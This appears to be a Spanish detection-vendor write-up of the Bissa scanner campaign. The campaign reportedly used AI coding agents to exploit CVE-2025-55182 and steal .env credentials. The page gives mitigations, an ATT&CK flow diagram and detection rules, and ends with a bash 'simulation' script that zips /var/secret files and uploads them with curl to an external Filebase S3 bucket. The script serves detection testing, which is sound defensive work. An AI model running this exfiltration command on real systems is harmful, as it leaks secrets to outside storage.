Bissa Scanner Expuesto: Explotación Masiva Asistida por IA y Recolección de Credenciales
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Un servidor expuesto reveló una operación a gran escala que utilizó la plataforma de escaneo Bissa, Claude Code y OpenClaw para automatizar la explotación de objetivos expuestos a Internet mediante una vulnerabilidad React2Shell (CVE‑2025‑55182). La campaña recogió millones de archivos .env que contenían credenciales de alto valor de servicios de IA, nube, pagos y mensajería. Los datos recopilados se subieron a un bucket público S3 en Filebase para su posterior uso. La operación se dirigió a organizaciones en los sectores financiero, de criptomonedas y minorista.
Investigación
Analistas recuperaron más de 13,000 archivos que muestran el flujo de trabajo para escanear, explotar, validar y priorizar entornos de víctimas. Los registros confirmaron más de 900 compromisos exitosos utilizando el exploit React2Shell. Se utilizaron bots de Telegram para alertas en tiempo real, vinculando cada acierto con detalles de la víctima. El escáner también contenía un módulo para una vulnerabilidad de WordPress W3 Total Cache (CVE‑2025‑9501), aunque no se observó explotación exitosa.
Mitigación
Corrija las aplicaciones y marcos vulnerables oportunamente, especialmente los componentes React2Shell y WordPress W3 Total Cache. Mueva los secretos fuera de los archivos .env hacia gestores de secretos dedicados y rote las credenciales regularmente. Refuerce el acceso a los metadatos en la nube y aplique RBAC de mínimo privilegio. Supervise el tráfico saliente para detectar cargas no autorizadas a servicios de almacenamiento externo.
Respuesta
Implemente reglas de detección para la explotación de CVE‑2025‑55182 y cargas no autorizadas a S3. Bloquee dominios maliciosos conocidos y comunicaciones de bots de Telegram. Realice un análisis forense de los hosts comprometidos para localizar y eliminar cargas útiles residuales. Notifique a los usuarios afectados y rote cualquier credencial filtrada de inmediato.
"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef action fill:#99ccff classDef operator fill:#ff9900 %% Nodes tool_bissa_scanner["<b>Herramienta</b> – <b>Nombre</b>: Escáner Bissa<br/><b>Propósito</b>: Realizar escaneo activo masivo usando feeds de objetivos"] class tool_bissa_scanner tool tech_T1595_002["<b>Técnica</b> – <b>T1595.002 Escaneo Activo: Escaneo de Vulnerabilidades</b><br/><b>Descripción</b>: Escanea hosts expuestos a Internet para encontrar servicios vulnerables"] class tech_T1595_002 technique tech_T1190["<b>Técnica</b> – <b>T1190 Explotación de Aplicaciones Públicas</b><br/><b>Descripción</b>: Explotación de aplicaciones web vulnerables para obtener acceso inicial"] class tech_T1190 technique tool_react2shell["<b>Herramienta</b> – <b>Nombre</b>: React2Shell (CVE‑2025‑55182)<br/><b>Función</b>: Proporciona ejecución remota de código mediante carga útil de React crafter"] class tool_react2shell tool tech_T1210["<b>Técnica</b> – <b>T1210 Explotación de Servicios Remotos</b><br/><b>Descripción</b>: Ejecuta carga útil en servicios remotos para obtener ejecución de código"] class tech_T1210 technique tech_T1211["<b>Técnica</b> – <b>T1211 Explotación para Evasión de Defensas</b><br/><b>Descripción</b>: Usa vulnerabilidades para evadir defensas y permanecer oculto"] class tech_T1211 technique tech_T1552_001["<b>Técnica</b> – <b>T1552.001 Credenciales no aseguradas: Credenciales en Archivos</b><br/><b>Descripción</b>: Recopila credenciales almacenadas en archivos de configuración como .env"] class tech_T1552_001 technique tech_T1119["<b>Técnica</b> – <b>T1119 Recolección Automatizada</b><br/><b>Descripción</b>: Automatiza la validación, priorización y agrupamiento de datos recopilados para extracción"] class tech_T1119 technique tech_T1102_002["<b>Técnica</b> – <b>T1102.002 Servicio Web: Comunicación Bidireccional</b><br/><b>Descripción</b>: Usa servicios web (bots de Telegram) para intercambiar comandos y datos"] class tech_T1102_002 technique tool_telegram_bot["<b>Herramienta</b> – <b>Nombre</b>: Bots de Telegram @bissapwned_bot, @bissa_scan_bot<br/><b>Propósito</b>: Canal de comando y control"] class tool_telegram_bot tool tech_T1567_002["<b>Técnica</b> – <b>T1567.002 Exfiltración a través de Servicio Web: Exfiltración a Almacenamiento en la Nube</b><br/><b>Descripción</b>: Sube archivos robados a almacenamiento en la nube vía servicio web"] class tech_T1567_002 technique tool_filebase_bucket["<b>Herramienta</b> – <b>Nombre</b>: Bucket compatible con Filebase S3 (bissapromax)<br/><b>Propósito</b>: Almacena archivos de credenciales exfiltradas"] class tool_filebase_bucket tool tech_T1537["<b>Técnica</b> – <b>T1537 Transferencia de Datos a Cuenta en la Nube</b><br/><b>Descripción</b>: Mueve datos a una cuenta en la nube controlada por el atacante para recuperación posterior"] class tech_T1537 technique tech_T1068["<b>Técnica</b> – <b>T1068 Explotación para Escalación de Privilegios</b><br/><b>Descripción</b>: Aprovecha credenciales recopiladas para obtener privilegios más altos y movimiento lateral"] class tech_T1068 technique %% Conexiones tool_bissa_scanner –>|realiza| tech_T1595_002 tech_T1595_002 –>|identifica servicios vulnerables| tech_T1190 tech_T1190 –>|usa| tool_react2shell tool_react2shell –>|entrega carga útil a| tech_T1210 tech_T1210 –>|habilita| tech_T1211 tech_T1211 –>|permite| tech_T1552_001 tech_T1552_001 –>|alimenta en| tech_T1119 tech_T1119 –>|envía datos a través de| tech_T1102_002 tech_T1102_002 –>|implementado por| tool_telegram_bot tech_T1102_002 –>|exfiltra a| tech_T1567_002 tech_T1567_002 –>|almacena en| tool_filebase_bucket tool_filebase_bucket –>|habilita| tech_T1537 tech_T1537 –>|apoya a| tech_T1068 "
Flujo del Ataque
Detecciones
Intento de explotación posible de CVE-2025-55182 (RCE no autenticada en los componentes del servidor de React) (vía servidor web)
Ver
Intento de explotación posible de CVE-2025-55182 (RCE no autenticada en los componentes del servidor de React) (vía proxy)
Ver
Comunicación C2 posible sobre HTTP a IP directa con puerto inusual (vía proxy)
Ver
Exfiltración de datos a través de Filebase compatible S3 [Proxy]
Ver
Exfiltración de datos a través de Filebase compatible S3 [AWS Cloudtrail]
Ver
Ejecución de la simulación
Prerequisito: la Verificación de Prevuelo de Telemetría & Línea Base debe haber pasado.
-
Narrativa del Ataque y Comandos:
El adversario ha recopilado un conjunto de documentos confidenciales de/var/secret/. Para evitar la detección, primero archivan los datos en un archivo ZIP protegido por contraseña, luego usancurlpara cargar el archivo directamente al punto final S3 de Filebase a través del proxy corporativo. El proxy registra la URL completa de la solicitud, que coincide con la regla de detección. -
Guion de Prueba de Regresión:
#!/usr/bin/env bash set -euo pipefail # 1️⃣ Etapa de datos (T1074) STAGE_DIR="/tmp/staged_data" mkdir -p "$STAGE_DIR" cp -r /var/secret/* "$STAGE_DIR/" # 2️⃣ Archivar datos (T1560.001) – zip protegido por contraseña ARCHIVE="/tmp/exfil_archive.zip" ZIP_PASSWORD="P@ssw0rd!" zip -r -P "$ZIP_PASSWORD" "$ARCHIVE" "$STAGE_DIR" > /dev/null # 3️⃣ Exfiltrar vía punto final Filebase S3 (T1020) # Asumir que el proxy es alcanzable en http://proxy.company.local:3128 FILEBASE_URL="https://s3.filebase.com/mybucket/exfil_archive.zip" curl -x http://proxy.company.local:3128 -T "$ARCHIVE" -H "Host: s3.filebase.com" -H "User-Agent: Mozilla/5.0" "$FILEBASE_URL" --silent --output /dev/null echo "Intento de exfiltración completado." -
Comandos de Limpieza:
# Eliminar archivos preparados y archivo rm -rf /tmp/staged_data /tmp/exfil_archive.zip # (Opcional) Vaciar conexiones del proxy si es necesario # Para Squid: squid -k rotate echo "Limpieza finalizada."